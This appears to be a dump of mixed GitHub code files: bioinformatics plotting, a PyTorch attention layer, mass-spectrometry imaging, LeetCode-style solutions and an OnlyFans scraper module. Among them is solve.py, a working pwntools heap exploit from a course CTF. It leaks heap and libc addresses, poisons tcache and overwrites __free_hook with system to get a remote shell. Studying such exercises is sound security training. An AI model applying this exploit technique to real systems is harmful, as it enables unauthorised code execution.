print(f\"\\nFrag mean: {frag_mean:.2f}\\nFrag median: {frag_median:.2f}\")\n\n return df_stats\n\n\ndef fastANI_scatter_plot(\n df, n, species, outfile, xmin, xmax, xstep, p , a, z, g, c\n ):\n \"\"\"Takes the data and builds the plot\"\"\"\n\n # Gather Stats\n df_stats = gather_stats(df)\n\n stats_line = (\n f\"Pearson r: {round(df_stats['pcorr'][0], 2)}\\n\"\n f\"p value: {round(df_stats['pcorr'][1], 2)}\"\n )\n\n # Set Colors and markers\n grid_color = '#d9d9d9'\n main_color = '#933b41'\n second_color = '#737373'\n vline_color = '#000000'\n color = '#252525'\n marker = '.' 
#'o'\n\n # build plot\n gg = sns.JointGrid(x=\"xs\", y=\"ys\", data=df)\n\n # x margin hist plot\n sns.histplot(\n x=df[\"xs\"],\n ax=gg.ax_marg_x,\n legend=False,\n color=color,\n stat='probability'\n )\n # y margin hist plot\n sns.histplot(\n y=df[\"ys\"],\n ax=gg.ax_marg_y,\n legend=False,\n color=color,\n stat='probability'\n )\n # main panel scatter plot\n if z: # density scatter plot with datashader\n print('\\nComputing plot densities.')\n import datashader as ds\n from datashader.mpl_ext import dsshow\n dsartist = dsshow(\n df,\n ds.Point(\"xs\", \"ys\"),\n ds.count(),\n norm=\"log\",\n aspect=\"auto\",\n ax=gg.ax_joint,\n width_scale=3.,\n height_scale=3.\n )\n dsartist.zorder = 2.5\n\n else: # regular scatter plot\n print('\\nPlotting data.')\n gg.ax_joint.plot(\n df[\"xs\"],\n df[\"ys\"],\n marker,\n ms=p,\n alpha=a,\n color=color,\n )\n\n if g:\n # Trendline with pyGAM\n print('\\nCalculating trendline with pyGAM.')\n X = df[\"xs\"].to_numpy()\n X = X[:, np.newaxis]\n y = df[\"ys\"].to_list()\n\n gam = LinearGAM().gridsearch(X, y)\n XX = gam.generate_X_grid(term=0, n=500)\n\n gg.ax_joint.plot(\n XX,\n gam.predict(XX),\n color='#FCEE21',\n linestyle='--',\n linewidth=1.0,\n zorder=2.8\n )\n gg.ax_joint.plot(\n XX,\n gam.prediction_intervals(XX, width=0.95),\n color='#CBCB2C',\n linestyle='--',\n linewidth=1.0,\n zorder=2.8\n )\n r2 = gam.statistics_['pseudo_r2']['explained_deviance']\n GAM_line = f\"GAM Pseudo R-Squared: {r2:.4f}\"\n gg.ax_joint.text(\n 0.75, 0.1, GAM_line,\n fontsize=10, color=second_color,\n verticalalignment='top', horizontalalignment='right',\n transform=gg.ax_joint.transAxes\n )\n\n\n # plot title, labels, text\n species_name = ' '.join(species.split('_'))\n ptitle = f'{species_name} (n={n})'\n gg.ax_marg_x.set_title(ptitle, fontsize=18, y=1.02)\n\n gg.ax_joint.set_xlabel(\n 'Average nucleotide identity (%)',\n fontsize=12, y=-0.02\n )\n gg.ax_joint.set_ylabel(\n 'Shared genome fraction', # 'Shared / total fragments'\n fontsize=12, x=-0.02\n )\n gg.ax_joint.text(\n 0.25, 0.99, stats_line,\n fontsize=10, color=second_color,\n verticalalignment='top', horizontalalignment='right',\n transform=gg.ax_joint.transAxes\n )\n\n # set the axis parameters / style\n hstep = xstep/10\n gg.ax_joint.set_xticks(np.arange(xmin, xmax+hstep, xstep))\n gg.ax_joint.set_xlim(left=xmin-hstep, right=xmax+hstep)\n\n gg.ax_joint.set_yticks(np.arange(0.6, 1.1, 0.1))\n gg.ax_joint.set_ylim(bottom=0.58, top=1.02)\n gg.ax_joint.tick_params(axis='both', labelsize=12)\n gg.ax_joint.tick_params(\n axis='both', which='major', direction='inout', color='k',\n width=2, length=6, bottom=True, left=True, zorder=3\n )\n\n # set grid style\n gg.ax_joint.yaxis.grid(\n which=\"major\", color='#d9d9d9', linestyle='--', linewidth=1\n )\n gg.ax_joint.xaxis.grid(\n which=\"major\", color='#d9d9d9', linestyle='--', linewidth=1\n )\n gg.ax_joint.set_axisbelow(True)\n gg.ax_joint.add_artist(TickRedrawer())\n\n if c:\n # Plot mean and median\n _ = gg.ax_joint.axvline(\n x=df_stats['ani_mean'], ymin=0, ymax=1,\n color=vline_color, linewidth=2, linestyle='--',\n label='Mean'\n )\n _ = gg.ax_joint.axhline(\n y=df_stats['frag_mean'], xmin=0, xmax=1,\n color=vline_color, linewidth=2, linestyle='--',\n )\n _ = gg.ax_joint.axvline(\n x=df_stats['ani_median'], ymin=0, ymax=1,\n color=vline_color, linewidth=2, linestyle=':',\n label='Mean'\n )\n _ = gg.ax_joint.axhline(\n y=df_stats['frag_median'], xmin=0, xmax=1,\n color=vline_color, linewidth=2, linestyle=':',\n )\n\n # Build legend for mean and median\n 
gg.ax_joint.legend(\n loc='lower left',\n fontsize=12,\n markerscale=1.5,\n numpoints=1,\n frameon=False,\n ncol=2\n )\n\n # adjust layout, save, and close\n gg.fig.set_figwidth(7)\n gg.fig.set_figheight(5)\n gg.savefig(f'{outfile}_{species}.pdf')\n plt.close()\n\n\ndef main():\n\n # Configure Argument Parser\n parser = argparse.ArgumentParser(\n description=__doc__,\n formatter_class=argparse.RawDescriptionHelpFormatter\n )\n parser.add_argument(\n '-i', '--input_file',\n help='Please specify the input file!',\n metavar='',\n type=str,\n required=True\n )\n parser.add_argument(\n '-o', '--output_file_prefix',\n help='Please specify the output file prefix!',\n metavar='',\n type=str,\n required=True\n )\n parser.add_argument(\n '-xmin', '--xaxis_minimum',\n help='OPTIONAL: Minimum value to plot on x-axis. (Default=95.0)',\n metavar='',\n type=float,\n default=95.0,\n required=False\n )\n parser.add_argument(\n '-xmax', '--xaxis_maximum',\n help='OPTIONAL: Maximum value to plot on x-axis. (Default=100.0)',\n metavar='',\n type=float,\n default=100.0,\n required=False\n )\n parser.add_argument(\n '-t', '--xaxis_step_size',\n help='OPTIONAL: X-axis ticks step increment. (Default=1.0)',\n metavar='',\n type=float,\n default=1.0,\n required=False\n )\n parser.add_argument(\n '-p', '--point_size',\n help='OPTIONAL: Size of the plotted points (Default=4.0)',\n metavar='',\n type=float,\n default=4.0,\n required=False\n )\n parser.add_argument(\n '-a', '--point_alpha',\n help='OPTIONAL: Alpha value of the plotted points (Default=0.10)',\n metavar='',\n type=float,\n default=0.10,\n required=False\n )\n parser.add_argument(\n '-c', '--add_cross_hairs',\n help='OPTIONAL: Input -c True mean/median cross hairs (Default=None).',\n metavar='',\n type=str,\n default=None,\n required=False\n )\n parser.add_argument(\n '-g', '--generate_GAM_trendline',\n help='OPTIONAL: Input -g True adds trendline with GAM (Default=None).',\n metavar='',\n type=str,\n default=None,\n required=False\n )\n parser.add_argument(\n '-r', '--random_subsample',\n help='OPTIONAL: Set > 1 to plot subsample of r genomes per species.',\n metavar='',\n type=int,\n default=1,\n required=False\n )\n parser.add_argument(\n '-e', '--repeat_subsamples',\n help='OPTIONAL: Repeat subsampling this many times (Default=100).',\n metavar='',\n type=int,\n default=100,\n required=False\n )\n parser.add_argument(\n '-s', '--single_species',\n help='OPTIONAL: Input -s True for single species plots (Default=None).',\n metavar='',\n type=str,\n default=None,\n required=False\n )\n parser.add_argument(\n '-l', '--all_species',\n help='OPTIONAL: Input -l True for all species one plot (Default=None).',\n metavar='',\n type=str,\n default=None,\n required=False\n )\n args=vars(parser.parse_args())\n\n # Do what you came here to do:\n print('\\n\\nRunning Script...\\n')\n\n # define parameters\n infile = args['input_file']\n outfile = args['output_file_prefix']\n single_species = args['single_species']\n all_species = args['all_species']\n xmin = args['xaxis_minimum']\n xmax = args['xaxis_maximum']\n xstep = args['xaxis_step_size']\n p = args['point_size']\n a = args['point_alpha']\n z = None\n c = args['add_cross_hairs']\n g = args['generate_GAM_trendline']\n r = args['random_subsample']\n e = args['repeat_subsamples']\n\n # test params\n if not all_species and not single_species:\n print(\n '\\nNo option specified. 
Please set -s, -a or both to True.\\n\\n'\n )\n sys.exit(1)\n\n # read in the data\n if r > 1:\n df, n = gather_subsampled_data(infile, xmin, xmax, r, e)\n else:\n df, n = gather_data(infile, xmin, xmax)\n\n # build the plot\n if all_species:\n if n > 10000: z = True\n else: z = None\n _ = fastANI_scatter_plot(\n df, n, 'All_species', outfile, xmin, xmax, xstep, p, a, z, g, c\n )\n if single_species:\n for species in df['species'].unique():\n print(f'\\tPlotting {species} ...')\n dfx = df[df['species'] == species]\n n = len(dfx)\n if n > 10000: z = True\n else: z = None\n if n >= 20:\n _ = fastANI_scatter_plot(\n dfx, n, species, outfile, xmin, xmax, xstep, p, a, z, g, c\n )\n \n print(f'\\n\\nComplete success space cadet!! Finished without errors.\\n\\n')\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"rotheconrad/bacterial_strain_definition","sub_path":"00b_Python/02a_fastANI_scatter_pyGAM.py","file_name":"02a_fastANI_scatter_pyGAM.py","file_ext":"py","file_size_in_byte":19376,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"24946959955","text":"import torch.nn as nn\nimport torch.nn.functional as F\nimport torch\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\"\"\"Cette classe de module de réseau de neurones est appelée \"Attention\", \n et elle est utilisée pour calculer l'attention sur les nœuds d'entrée donnés l'état courant.\"\"\"\n\n\nclass Attention(nn.Module):\n\n def __init__(self, hidden_size):\n super(Attention, self).__init__()\n\n self.v = nn.Parameter(torch.zeros((1, 1, hidden_size), device=device, requires_grad=True))\n\n self.W = nn.Parameter(torch.zeros((1, hidden_size, 3 * hidden_size), device=device, requires_grad=True))\n\n def forward(self, static_hidden, dynamic_hidden, decoder_hidden):\n batch_size, hidden_size, _ = static_hidden.size()\n\n hidden = decoder_hidden.unsqueeze(2).expand_as(static_hidden)\n hidden = torch.cat((static_hidden, dynamic_hidden, hidden), 1)\n\n v = self.v.expand(batch_size, 1, hidden_size)\n W = self.W.expand(batch_size, hidden_size, -1)\n\n attns = torch.bmm(v, torch.tanh(torch.bmm(W, hidden)))\n attns = F.softmax(attns, dim=2)\n return attns\n","repo_name":"mory-moussa/VRP","sub_path":"Model/Attention.py","file_name":"Attention.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"26639973330","text":"import cv2\nimport math\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom sklearn.cluster import KMeans\nfrom sklearn.decomposition import PCA\nfrom PIL import Image\n\n\ndef read_data_file(filename):\n \"\"\"\n Read the data file and split it by newline.\n \"\"\"\n with open(filename, 'r') as file:\n data = file.read().split(\"\\n\")\n return data\n\n\ndef preprocess_data(data):\n \"\"\"\n Preprocess the data by replacing tabs with commas and converting to floats.\n \"\"\"\n preprocessed_data = []\n for line in data:\n line = line.replace('\\t', ',')\n line = line.split(',')\n line = [float(x) for x in line]\n preprocessed_data.append(line)\n return preprocessed_data\n\n\n# Mass Alignment between to provide accurate representation of chemical\ndef collect_data_by_ablation_time(preprocessed_data, start_time, ablation_time):\n \"\"\"\n Collect data for each ablation time interval.\n \"\"\"\n collected_data = []\n current_time = start_time\n current_interval_data = []\n\n for line in preprocessed_data:\n if line[0] < 
current_time:\n continue\n elif current_time <= line[0] < current_time + ablation_time:\n current_interval_data.append(line)\n else:\n current_interval_data.append(line)\n collected_data.append(current_interval_data)\n current_time += ablation_time\n current_interval_data = []\n\n return collected_data\n\n\n# peak picking --> Being able to increase the singal to noise ratio while preserving all important features\ndef subtract_background_noise(collected_data, noise):\n \"\"\"\n Subtract background noise and calculate the sum of intensities for each interval.\n \"\"\"\n intensities = []\n interval_intensity = 0\n\n for interval in collected_data:\n for line in interval:\n intensity = max(line[1] - noise, 0)\n interval_intensity += intensity\n intensities.append(interval_intensity)\n interval_intensity = 0\n\n return intensities\n\n\n# implement the three steps of noise reduction here,\n\n\ndef scale_and_log_transform(intensities, ablation_times):\n \"\"\"\n Scale and perform logarithmic transformation on the intensities.\n \"\"\"\n scaled_intensities = np.zeros(ablation_times)\n\n for i in range(min(len(scaled_intensities), len(intensities))):\n if intensities[i] > 0:\n scaled_intensities[i] = math.log(intensities[i], 10)\n\n return scaled_intensities\n\n\ndef reshape_data_for_visualization(scaled_intensities, length):\n \"\"\"\n Reshape the data for image visualization.\n \"\"\"\n reshaped_data = []\n\n for i in range(0, len(scaled_intensities), length):\n reshaped_data.append(scaled_intensities[i:i + length])\n\n return reshaped_data\n\n\ndef reverse_alternate_rows(reshaped_data):\n \"\"\"\n Reverse alternate rows in the reshaped data.\n \"\"\"\n reversed_data = []\n\n for i in range(len(reshaped_data)):\n if i % 2 == 0:\n reversed_data.append(reshaped_data[i])\n else:\n reversed_data.append(reshaped_data[i][::-1])\n\n return reversed_data\nfrom matplotlib.colors import LinearSegmentedColormap\n\n\ndef transparent_colormap(existing_cmap_name = 'jet'):\n ncolors = 256\n color_array = plt.get_cmap(existing_cmap_name)(range(ncolors))\n\n # change alpha value of first color\n color_array[0,-1] = 0.0\n\n # create a colormap object\n new_cmap = LinearSegmentedColormap.from_list(name=f'{existing_cmap_name}_alpha', colors=color_array)\n\n # register this new colormap with matplotlib\n plt.register_cmap(cmap=new_cmap)\n \n return new_cmap\n\n\ndef save_image(reshaped_data, filename):\n \"\"\"\n Save the mass spectrometry image as an image file.\n \"\"\"\n image = np.array(reshaped_data)\n new_cmap = transparent_colormap()\n plt.imsave(filename, image, cmap=new_cmap)\n\n\n\n\ndef display_image_with_colorbar(reshaped_data):\n \"\"\"\n Display the mass spectrometry image with a colorbar.\n \"\"\"\n image = np.array(reshaped_data)\n plt.imshow(image, cmap=\"jet\")\n plt.colorbar(label='log(Signal intensity [arb. 
units])')\n plt.xticks([0, 25, 50, 75, 100], [0, 1, 2, 3, \"4\\nmm\"], fontsize=20)\n plt.yticks([0, 25, 50, 75, 100], [\"4\\nmm\", 3, 2, 1, 0], fontsize=20)\n plt.show()\n\n\ndef perform_kmeans_clustering(reshaped_data, num_clusters):\n \"\"\"\n Perform k-means clustering on the reshaped data.\n \"\"\"\n flattened_data = np.array(reshaped_data).flatten()\n kmeans = KMeans(n_clusters=num_clusters)\n kmeans.fit(flattened_data.reshape(-1, 1))\n cluster_labels = kmeans.labels_\n return cluster_labels\n\ndef perform_pca(data):\n # Initialize PCA with desired number of components\n pca = PCA(n_components=2)\n \n # Perform PCA on the data\n pca_data = pca.fit_transform(data)\n \n return pca_data\n\n\ndef main():\n # Specify input data and parameters\n IMS_data = 'ToFData\\\\230111_caffeini_3_195_1.txt'\n AbrationTime = 0.05054\n StartTime = 1.0\n Noise = 50\n Length = 100\n AbrationTimes = 10000\n\n # Step 1: Read the data file\n data = read_data_file(IMS_data)\n\n # Step 2: Preprocess the data\n preprocessed_data = preprocess_data(data)\n\n # Step 3: Collect data for each ablation time interval\n collected_data = collect_data_by_ablation_time(preprocessed_data, StartTime, AbrationTime)\n\n # Step 4: Subtract background noise and calculate intensities\n intensities = subtract_background_noise(collected_data, Noise)\n\n # Step 5: Scale and perform logarithmic transformation\n scaled_intensities = scale_and_log_transform(intensities, AbrationTimes)\n \n # Perform PCA on the scaled intensities\n #pca_data = perform_pca(np.resscaled_intensities)\n\n # Step 6: Reshape the data for visualization\n reshaped_data = reshape_data_for_visualization(scaled_intensities, Length)\n\n # Step 7: Reverse alternate rows\n reversed_data = reverse_alternate_rows(reshaped_data)\n\n\n # Perform k-means clustering on the reshaped data\n cluster_labels = perform_kmeans_clustering(reversed_data, 100)\n\n # Generate x and y coordinate arrays based on the shape of reversed_data\n x, y = np.meshgrid(np.arange(len(reversed_data[0])), np.arange(len(reversed_data)))\n\n # Plot K-means clustering results\n plt.scatter(x.flatten(), y.flatten(), c=cluster_labels, cmap='jet')\n plt.xlabel('X')\n plt.ylabel('Y')\n plt.title('K-means Clustering Results')\n plt.colorbar(label='Cluster Labels')\n plt.show()\n\n # Step 8: Save the mass spectrometry image\n save_image(reversed_data, 'MSI_image.bmp')\n\n # Step 9: Display the mass spectrometry image with colorbar\n display_image_with_colorbar(reversed_data)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"VarunSendilraj/MassSpecProj","sub_path":"OrignalCode/optimizedScript_V2.py","file_name":"optimizedScript_V2.py","file_ext":"py","file_size_in_byte":6750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"74795326665","text":"'''\nmain idea: recursion + memo\ntime comp: O(nd)\nspace comp: O(n)\n- where n is the target amount and d is the length of the denoms\n'''\ndef minNumberOfCoinsForChange(n, denoms):\n # Write your code here.\n\tmemo = {}\n\tdef recr(amount, idx):\n\t\tnonlocal ans\n\t\t\n\t\tif amount == 0:\n\t\t\treturn 0\n\t\t\n\t\tif idx >= len(denoms) or amount < 0:\n\t\t\treturn float('inf')\n\t\t\n\t\tif (amount, idx) not in memo:\n\t\t\tret = recr(amount, idx+1)\n\t\t\tfor i in range(1, amount // denoms[idx] + 1):\n\t\t\t\tret = min(ret, i + recr(amount - i*denoms[idx], idx+1))\n\t\t\tmemo[amount, idx] = ret\n\t\treturn memo[amount, idx]\n\t\n\tans = recr(n, 0) \n\treturn ans if ans < float('inf') else 
-1\n","repo_name":"novayo/LeetCode","sub_path":"AlgoExpert/coding_interview_questions/Dynamic_Programming/Min_Number_Of_Coins_For_Change.py","file_name":"Min_Number_Of_Coins_For_Change.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"81"} +{"seq_id":"27516897104","text":"class Solution:\n def findRadius(self, houses, heaters):\n \"\"\"\n :type houses: List[int]\n :type heaters: List[int]\n :rtype: int\n \"\"\"\n # 这题对边界的处理感觉很巧妙,我自己想不出来,这题是直接搬的答案\n houses.sort()\n heaters.sort()\n radius, i = 0, 0\n for house in houses:\n while i < len(heaters) and heaters[i] < house:\n i += 1\n if i == 0:\n radius = max(radius, heaters[i] - house)\n elif i == len(heaters):\n radius = max(radius, houses[-1] - heaters[-1])\n else:\n radius = max(radius, min(house - heaters[i-1], heaters[i] - house))\n return radius","repo_name":"mancunian100/leetcode","sub_path":"easy/Python/475Heaters.py","file_name":"475Heaters.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"35116453761","text":"\r\nfrom pwn import *\r\nimport sys\r\n\r\ncontext.arch = 'amd64'\r\ncontext.terminal = ['tmux', 'splitw', '-h']\r\n\r\n# r = process('./easyheap')\r\nr = remote('edu-ctf.zoolab.org', 30211)\r\n\r\ndef add_book(idx, name_len, name, price):\r\n r.sendlineafter(\"> \", str(1))\r\n r.sendlineafter(\"Index: \", str(idx))\r\n r.sendlineafter(\"name: \", str(name_len))\r\n r.sendafter(\"Name: \", name)\r\n r.sendlineafter(\"Price: \", str(price))\r\n\r\n\r\n\r\ndef delete_book(idx):\r\n r.sendlineafter(\"> \", str(2))\r\n r.sendlineafter(\"delete: \", str(idx))\r\n\r\n\r\ndef edit_book(idx, name, price):\r\n \r\n r.sendlineafter(\"> \", str(3))\r\n\r\n r.sendlineafter(\"edit: \", str(idx))\r\n r.sendafter(\"Name: \", name)\r\n r.sendlineafter(\"Price: \", str(price))\r\n \r\n\r\ndef list_book():\r\n r.sendlineafter(\"> \", str(4))\r\n\r\ndef get_name_from_idx(idx):\r\n r.sendlineafter(\"> \", str(5))\r\n r.sendlineafter(\"Index: \", str(idx))\r\n\r\n\r\n \r\n\r\n# 1. Leak heap address\r\ndef leak_heap_addr():\r\n add_book(0, 0x410, 'mark', 300)\r\n add_book(1, 0x410, 'mobiln', 300)\r\n\r\n delete_book(0)\r\n list_book()\r\n r.recvuntil(\"Index:\\t\")\r\n test_addr = r.recvuntil(\"\\n\")\r\n heap_addr = int(test_addr[:-1]) - 0x10\r\n # print(hex(test_addr[:-1]))\r\n print(hex(heap_addr))\r\n return heap_addr\r\n\r\n# 1. 
Leak heap & libc address\r\ndef leak_libc_addr():\r\n add_book(0, 0x410, 'mark', 300)\r\n add_book(1, 0x20, 'mark', 300)\r\n add_book(2, 0x410, 'mark', 300)\r\n add_book(3, 0x10, 'mark', 300)\r\n\r\n delete_book(0)\r\n delete_book(1)\r\n\r\n delete_book(2)\r\n\r\n get_name_from_idx(1)\r\n\r\n r.recvuntil(\"Name: \")\r\n a = r.recvline()\r\n heap_A = int.from_bytes(a[:-1], 'little')\r\n # print(hex(heap_A))\r\n target = heap_A + 0x30\r\n # print(hex(target))\r\n heap_base = heap_A - 0x2a0\r\n print(\"Heap base: \", heap_base)\r\n\r\n edit_book(2, p64(target), 500)\r\n get_name_from_idx(1)\r\n r.recvuntil(\"Name: \")\r\n a = r.recvline()\r\n main_arena = int.from_bytes(a[:-1], 'little')\r\n libc = main_arena - 0x1ebbe0\r\n print(\"libc: \", hex(libc))\r\n\r\n return heap_base, libc\r\n\r\ndef exploit(heap_base, libc_base, free_hook, _system):\r\n # add new chunk 3 to tcache\r\n delete_book(3)\r\n # change C's name pointer to B\r\n add_book(4, 0x28, p64(heap_base + 0x6f0), 300)\r\n print(hex(heap_base+0x6f0))\r\n edit_book(2, p64(free_hook - 8), 300)\r\n\r\n # modify free_hook to system\r\n add_book(5, 0x28, b'/bin/sh\\x00' + p64(_system), 300)\r\n\r\n # get shell from release\r\n delete_book(5)\r\n r.interactive()\r\n\r\nheap_base, libc_base = leak_libc_addr()\r\nfree_hook = libc_base + 0x1eeb28\r\n_system = libc_base + 0x55410\r\nprint(\"free hook: \", hex(free_hook))\r\nprint(\"system: \", hex(_system))\r\n\r\nexploit(heap_base, libc_base, free_hook, _system)\r\n\r\n","repo_name":"CyCTW/NTU-ComputerSecurity-110","sub_path":"pwn/pwnbox/easyheap/share/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":2742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"7131636030","text":"from django.shortcuts import render\nfrom .forms import AudioForm\nfrom .processingAudio import Amplitude,spectogram,silence,emotionOutput\n\ndef home(request):\n if request.method == 'POST':\n form = AudioForm(request.POST,request.FILES)\n if form.is_valid():\n audio_name = form.cleaned_data['audio']\n ans = emotionOutput(audio_name)\n out = ans.split('_')\n context = {\n 'amp': Amplitude(audio_name),\n 'sep': spectogram(audio_name),\n 'sil': silence(audio_name),\n 'gen' : out[0],\n 'emo' : out[1],\n }\n return render(request, 'audio/out.html', context)\n\n else:\n form = AudioForm()\n\n return render(request, 'audio/main.html', {'form': form})\n\n\ndef test(request):\n return render(request,'base.html')\n","repo_name":"parthrr510/AudioAnalyser","sub_path":"audio/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"3024264188","text":"\"\"\"adding Movie table back with new movie_id column\n\nRevision ID: fa6f55c6e6cb\nRevises: 9decc63fffe2\nCreate Date: 2022-04-05 10:52:25.026836\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'fa6f55c6e6cb'\ndown_revision = '9decc63fffe2'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.create_table('movie',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('movie', sa.PickleType(), nullable=False),\n sa.Column('movie_id', sa.Integer(), nullable=False),\n sa.Column('user_id', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('movie')\n # ### end Alembic commands ###\n","repo_name":"ggroshansii/movie-date-app","sub_path":"api/migrations/versions/fa6f55c6e6cb_adding_movie_table_back_with_new_movie_.py","file_name":"fa6f55c6e6cb_adding_movie_table_back_with_new_movie_.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"18137491181","text":"#! /usr/bin/python\n# -*- coding: iso-8859-15 -*-\nfrom pylab import *\nimport matplotlib.pyplot as plt \nfrom matplotlib import * \nimport numpy as np\nperiodo = 0.5\n\n# Definimos el array dimensional\nx = np.linspace(0, 2, 1000)\n\n# Definimos la función senoidal\ny = np.sin(2*np.pi*x/periodo)\n\n# Creamos la figura\nplt.figure()\n\n# Dibujamos en negro discontinuo con etiqueta y1\nplt.plot(x, y, 'k--', linewidth = 2, label = 'y1')\n\n# Mantenemos la misma figura parta la siguiente gráfica\nplt.hold(True)\n\n# Esta vez dibujamos - y en rojo co etiqueta y2\nplt.plot(x,-y,'r', linewidth = 2, label = 'y2')\n\n# Añadimos la leyenda\nplt.legend(loc = 2)\n\n# Añadimos las etiquetas poniermo en Latex \"mu\" símbolo de micras\nplt.xlabel(r\"$x (\\mu m)$\", fontsize = 24, color = (1,0,0))\nplt.ylabel(r\"$y (\\mu m)$\", fontsize = 24, color = 'blue')\n\n# Añadimos texto\nplt.text(x = 1, y = 0.0, s = u'T = 0.05', fontsize = 24)\n\n# Añadimos la rejilla\nplt.grid(True)\nplt.grid(color = '0.5', linestyle = '--', linewidth = 1)\n\n# Añadimos los ejes\nplt.axis('tight')\n\n# Añadimos el título \nplt.title('(a)',fontsize = 28, color = '0.75', verticalalignment = 'baseline', horizontalalignment = 'center')\n\n# Guardamos\nplt.savefig('plotCompleta.png')\n\t\n# Mostramos en pantalla\nplt.show()","repo_name":"julioh/python-chile","sub_path":"graficos1.py","file_name":"graficos1.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"32398617647","text":"r\"\"\"\n _ __ \n ___ _ __ | | _ _ / _| __ _ _ __ ___ ___ ___ _ __ __ _ _ __ ___ _ __ \n / _ \\ | '_ \\ | || | | || |_ / _` || '_ \\ / __| _____ / __| / __|| '__| / _` || '_ \\ / _ \\| '__|\n| (_) || | | || || |_| || _|| (_| || | | |\\__ \\|_____|\\__ \\| (__ | | | (_| || |_) || __/| | \n \\___/ |_| |_||_| \\__, ||_| \\__,_||_| |_||___/ |___/ \\___||_| \\__,_|| .__/ \\___||_| \n |___/ |_| \n\"\"\"\n\nimport httpx\n\nfrom ..constants import messagesEP, messagesNextEP\nfrom ..utils import auth\n\n\ndef scrape_messages(headers, user_id, message_id=0) -> list:\n ep = messagesNextEP if message_id else messagesEP\n url = ep.format(user_id, message_id)\n\n with httpx.Client(http2=True, headers=headers) as c:\n auth.add_cookies(c)\n c.headers.update(auth.create_sign(url, headers))\n\n r = c.get(url, timeout=None)\n if not r.is_error:\n messages = r.json()['list']\n if not messages:\n return messages\n messages += scrape_messages(headers, user_id, messages[-1]['id'])\n return messages\n r.raise_for_status()\n\n\ndef parse_messages(messages: list, user_id):\n messages_with_media = 
[(message['media'], message['createdAt'])\n for message in messages if message['fromUser']['id'] == user_id and message['media']]\n\n messages_urls = []\n for message in messages_with_media:\n media, date = message\n for m in media:\n if m['canView']:\n messages_urls.append((m['src'], date, m['id'], m['type']))\n\n return messages_urls\n","repo_name":"taux1c/onlyfans-scraper","sub_path":"onlyfans_scraper/api/messages.py","file_name":"messages.py","file_ext":"py","file_size_in_byte":1772,"program_lang":"python","lang":"en","doc_type":"code","stars":273,"dataset":"github-code","pt":"81"} +{"seq_id":"29703668216","text":"__author__ = 'japaz'\n\nimport literals\n\n# General elements\nCL_NAME = 1\n\n# Heads\nCL_HEAD_OBJECT = 1001\n\ninfo = {\n CL_HEAD_OBJECT: {\n 'description':'expresion for object entry head'\n },\n CL_NAME:{\n 'description':'regular expresión for a free name'\n }\n}\n\nexpressions = {\n CL_HEAD_OBJECT:'{CL_NAME} [CL_IS] [CL_OBJECT]'\n }","repo_name":"Johan-Paz/claws","sub_path":"compiler/elements.py","file_name":"elements.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"72072014665","text":"from sklearn.impute import SimpleImputer\nfrom sklearn.preprocessing import LabelEncoder\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\ndf_titanic = pd.read_csv('./content/test.csv')\n\n# Identificar datos ausentes en datos tabulares\nprint(f\"Identificar ausentes en datos tabulares:\\n {df_titanic.isnull().sum()}\")\n\nprint(f\"Eliminar muestras o caracteristicas con valores ausentes:\\n{df_titanic.dropna()}\")\n\nimr = SimpleImputer(strategy=\"most_frequent\")\nimr = imr.fit(df_titanic.values)\nimputed_data = imr.transform(df_titanic.values)\n\nprint(f\"Imputar datos ausentes:\\n{imputed_data}\")\n\nsex_mapping = { label:idx for idx, label in enumerate(np.unique(df_titanic['Sex']))}\ndf_titanic['Sex'] = df_titanic['Sex'].map(sex_mapping)\nembarked_mapping = { label:idx for idx, label in enumerate(np.unique(df_titanic['Embarked']))}\ndf_titanic['Embarked'] = df_titanic['Embarked'].map(embarked_mapping)\n\n# Con este codigo códicariamos la caracteristicas ordinales\n# pclass_mapping = {\n# \"First class\": 1, \n# \"Second class\": 2,\n# \"Third Class\": 3\n# }\n\n# df_titanic['PClass'] = df_titanic['PClass'].map(pclass_mapping)\n\n\n#codificacion\nprint(f\"Codificar etiquetas de clase\\n: ${df_titanic}\")\n\ndatosCodificados = pd.get_dummies(df_titanic['Embarked'])\n\ndf_titanic = pd.concat([df_titanic, datosCodificados], axis=1)\n\nprint(f\"Realizar una codificación en caliente sobre características nominales\\n: ${df_titanic}\")\n\n# Eliminar columnas no numéricas irrelevantes\ndf_titanic = df_titanic.drop(['Name', 'Ticket', 'Cabin'], axis=1)\n\n# Cálculo de la matriz de correlación\ncorrelation_matrix = 